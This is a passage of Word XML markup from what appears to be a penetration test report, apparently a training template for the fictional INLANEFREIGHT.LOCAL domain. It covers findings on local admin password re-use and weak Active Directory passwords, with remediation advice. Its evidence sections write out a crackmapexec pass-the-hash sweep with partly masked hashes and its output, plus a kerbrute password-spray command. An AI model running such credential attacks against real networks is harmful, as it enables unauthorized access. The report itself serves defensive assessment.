              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74EA639C" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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27" w:history="1">
              <w:r w:rsidR="003260D5" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-522</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="2C4BC18F"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11AFDEF5" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23090684" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5"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9.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="43AC5C1D"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714D48FD" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Description (Incl. Root Cause)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF5FB09" w14:textId="6B770FE9" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="00F4100D" w:rsidP="00BC21AF">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All </w:t>
            </w:r>
            <w:r w:rsidR="00DC5A70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">servers in the domain were found to be using the same password for the built-in local Administrator account. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="7A6BF5EC"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4656A831" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="057F299C" w14:textId="35B84887" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="00F4100D"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If an attacker </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>can</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> compromise one host in the domain and retrieve the NTLM password hash for the built-in local Administrator account the</w:t>
            </w:r>
            <w:r w:rsidR="00DC5A70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">y could </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">use this to access all hosts in the domain using this same account, potentially leading to domain compromise or </w:t>
            </w:r>
            <w:r w:rsidR="00DC5A70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>significant sensitive data disclosure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="2972307F"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1AC65E0A" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Affected Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4712707C" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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7D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="5D11A073"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1CBB3DBF" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21DAAC53" w14:textId="0CEB4DAB" w:rsidR="003260D5" w:rsidRPr="00DC5A70" w:rsidRDefault="00DC5A70" w:rsidP="00DC5A70">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Modify local administrator passwords on all affected hosts to be unique values. Consider a solution such as the </w:t>
            </w:r>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="00DC5A70">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>Microsoft Local Administrator Password Solution (LAPS)</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to manage local administrator passwords centrally in Active Directory. This tool mitigates the risk of password re-use by assigning a different machine-generated randomized password to each host that changes automatically on a set interval.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="2E3593F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084553BE" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>External References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="315205CF" w14:textId="77777777" w:rsidR="003260D5" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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9" w:history="1">
              <w:r w:rsidR="003260D5" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1558/003/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="003260D5" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66AA4C14" w14:textId="5D4C40DC" w:rsidR="00DC5A70" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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30" w:history="1">
              <w:r w:rsidR="00DC5A70" w:rsidRPr="005B6982">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://techcommunity.microsoft.com/t5/itops-talk-blog/step-by-step-guide-how-to-configure-microsoft-local/ba-p/2806185</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00DC5A70">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74B9D906" w14:textId="77777777" w:rsidR="003260D5" w:rsidRDefault="003260D5" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B9679" w14:textId="623702D2" w:rsidR="003260D5" w:rsidRDefault="00DC5A70" w:rsidP="004539C5">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00DC5A70">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CrackMapExec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> tool to test for local administrator password re-use. The command below ensures that only one logon attempt is made per host to avoid account lockout. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DC5A70" w14:paraId="6BDF517A" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66A44736" w14:textId="6DAB7B69" w:rsidR="00DC5A70" w:rsidRDefault="00DC5A70" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC5A70">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>sudo crackmapexec smb --local-auth 192.168.195.0/24 -u administrator -H 31d6cfe0d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>xxxxxxxxxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC5A70">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9d7e0c089c0 |  grep +</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="544AC3F2" w14:textId="77777777" w:rsidR="00DC5A70" w:rsidRPr="00DC5A70" w:rsidRDefault="00DC5A70" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="474CCA05" w14:textId="5E23671F" w:rsidR="00DC5A70" w:rsidRPr="00DC5A70" w:rsidRDefault="00DC5A70" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC5A70">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB         192.168.195.205 445    MS01             [+] MS01\administrator 31d6cfe0dxxxxxxxxxx9d7e0c089c0 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E1F251A" w14:textId="0F380767" w:rsidR="00DC5A70" w:rsidRDefault="00DC5A70" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC5A70">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB         192.168.195.220 445    SQL01            [+] SQL01\administrator 31d6cfe0dxxxxxxxxxx9d7e0c089c0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FA8E2C0" w14:textId="73DFD4F4" w:rsidR="00DC5A70" w:rsidRDefault="00DC5A70">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Testing for Local Admin Password Re-Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFFFBD" w14:textId="77777777" w:rsidR="003260D5" w:rsidRDefault="003260D5">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06605B13" w14:textId="46529C0A" w:rsidR="007046B0" w:rsidRPr="00520B63" w:rsidRDefault="00B75D2B" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Weak Active Directory Passwords </w:t>
      </w:r>
      <w:r w:rsidR="007046B0" w:rsidRPr="006372B6">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="007046B0" w:rsidRPr="006372B6">
        <w:rPr>
          <w:color w:val="FF3E3E"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="0CC304E8"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3992AD49" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B0EAB00" w14:textId="15AB08C0" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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32" w:history="1">
              <w:r w:rsidR="00B75D2B" w:rsidRPr="00B75D2B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-521</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="28978072"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309FECF5" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02524115" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0"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9.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="5C3E5668"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572769A2" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Description (Incl. Root Cause)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E0C62FD" w14:textId="0FDFC752" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="00FD16E9" w:rsidP="00BC21AF">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The tester found that users were using common, weak, passwords within the Active Directory domain and was able to uncover passwords for several users via a password spraying attack. Furthermore, an analysis of all domain passwords after achieving domain compromise showed more widespread weak password usage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="5EAC5C7A"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5E85AD18" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="494E5F57" w14:textId="46AE34D2" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="00FD16E9"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An attacker may be able to use this to guess passwords and gain a foothold within the internal environment. If external services are set up with Active Directory authentication (such as VPN, email, or remote application services) an attacker may be able to perform a targeted password spray to gain internal network access from an anonymous position on the internet. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="70E4A0DB"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1564A64A" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Affected Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D53DB7F" w14:textId="6A3904DF" w:rsidR="00C82776" w:rsidRPr="005246AF" w:rsidRDefault="007046B0" w:rsidP="004539C5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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7D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514C22EC" w14:textId="659A226F" w:rsidR="00C82776" w:rsidRPr="00C82776" w:rsidRDefault="00C82776" w:rsidP="00C82776">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C82776">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:i/>
              </w:rPr>
              <w:t>See Appendix E – INLANEFREIGHT.LOCAL Domain Password Review for a detailed domain password analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="1D5D9494"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0DFBEBB2" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="148DC224" w14:textId="511206A3" w:rsidR="007046B0" w:rsidRPr="00FD16E9" w:rsidRDefault="00FD16E9" w:rsidP="00FD16E9">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Review the password policy and enforce a </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12-character</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> minimum password. Consider implementing an enterprise password manager to encourage the use of strong, randomized, passwords. Implement a password filter to restrict the use of common words such as variations on the words “welcome” and “password”, seasons, months, and variations on the company name. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007046B0" w:rsidRPr="00B96066" w14:paraId="4F967DD9"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2A19BFC5" w14:textId="77777777" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="007046B0" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>External References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38DE9F6A" w14:textId="39FFE65B" w:rsidR="007046B0" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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33" w:history="1">
              <w:r w:rsidR="007046B0" w:rsidRPr="005B6982">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/mitigations/M1027/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="007046B0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AC2D326" w14:textId="77777777" w:rsidR="007046B0" w:rsidRDefault="007046B0" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2B2409" w14:textId="19388B8A" w:rsidR="007046B0" w:rsidRDefault="00FD16E9" w:rsidP="007046B0">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Performing a password spraying attack against all domain users</w:t>
      </w:r>
      <w:r w:rsidR="004B0583">
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="004B0583" w:rsidRPr="004B0583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Kerbrute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004B0583">
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and finding two valid passwords</w:t>
      </w:r>
      <w:r w:rsidR="007046B0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="007046B0" w14:paraId="27CDFBCF" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CC26C6" w14:textId="59B8A24C" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="007046B0" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="005345C1" w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$kerbrute passwordspray --dc 192.168.195.204 -d INLANEFREIGHT.LOCAL domain_users.txt </w:t>
